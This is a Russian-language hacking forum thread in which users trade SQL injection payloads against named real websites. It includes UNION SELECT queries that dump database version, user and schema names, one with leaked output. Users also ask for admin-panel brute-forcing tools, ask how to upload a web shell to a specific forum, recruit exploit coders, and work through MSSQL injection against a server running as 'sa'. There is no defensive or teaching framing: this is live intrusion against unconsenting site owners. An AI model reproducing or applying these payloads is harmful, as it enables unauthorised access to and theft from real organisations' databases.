че за фигня?) в httpd.conf прописано DocumentRoot "/usr/local/apache/htdocs" а в /usr/local/apache/htdocs файлы index.html на разных языках и папка manual. походу это от установки апача но самого сайта нет(( как так?)
Правильно подозреваешь http://www.rfrap.ru/site/index.php?p=16+and+substring(version(),1,1)=3 Вот материал по проведению инъекций в третьей ветке https://forum.antichat.ru/showpost.php?p=565034&postcount=4
Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.
как быть? кто подстажет каким методом можна залить сюда нормальный шелл? http://forum.fwuo.ru/ajax.php?vital=pwd и еще.. нужны кодеры который могуть писать сплоиты!
здесь MS Access, нужно подбирать таблицу наугад http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+%60MSysObjects%60%00&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp доступа к MSysObjects нет с помощью команды fetch fetch -p [src] -O [out]
доброй ночи, есть вопрос, возможно глупый, но для меня важный. если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
PHP: http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123)+UniOn+SelEct+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* standard:bodynz_admin@localhost:bodynz_shop
Кто знает,в чём причина ? (select+system_user)-- - Выводит страницу,но в гайде было сказано про system_user(),а не system_user,но вот 1+and+1=system_user-- (Без скобок) работает.Может,я и делал неправильно,но так работает.CHAR(),к сожалению,тоже не работает. (select+syssdlfkf_user) - Пишет ошибку Значит,system_user существует. LIMIT не работает,но можно через нот ин: (select+column_name from information_schema.columns+where+table_name+not+in+(0x7573657273)-- не катит.Как потом выяснилось,с hex() тоже. (select+column_name+from+information_schema.columns+where+table_name+not+in+(char(117)+char(115)+char(101)+char(114)+char(115))) Тоже не катит.Через ТОР тоже. db_name() работает,но не в форме (select+db_name()),а как условие: 1+and+1=db_name() Выяснил,что всего там 12 баз данных.Сразу вспомнился гайд по эксплуатации MsSql inj здесь,на форуме.Теперь вопросы: 1)В information_schema.tables содержатся таблицы от всех 12-и баз ?На одном сервере эти таблицы или могут быть на нескольких серверах ? 2)Каков правильный синтаксис процедур в MsSql ? 3)Как выбрать поле из определённой таблицы через ТОР,как это было в случае таблиц ? ЗЫ: Мучал сервер Microsoft SQL Server 2005 на винде со вторым сервис паком.Судя по ошибке - одноядерный )В качестве системного юзера стоит 'sa',так что на процедуры забивать пока не собираюсь )))
Ппц.. я не знаю, что за "гайд" ты там читал... Но... Code: (select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)-- Ты понимаешь, что это за запрос? Перевожу: Выбрать имя колонки из information_schema, где имя таблицы не 0x7573657273. Если хочешь выводить колонки из таблиц: Code: (select+top+1+column_name+from+information_schema.columns+where+table_name='таблица'+and+COLU MN_NAME+not+in+('колонка','колонка2'))-- Вот гайд, читай. http://forum.antichat.ru/thread30501.html
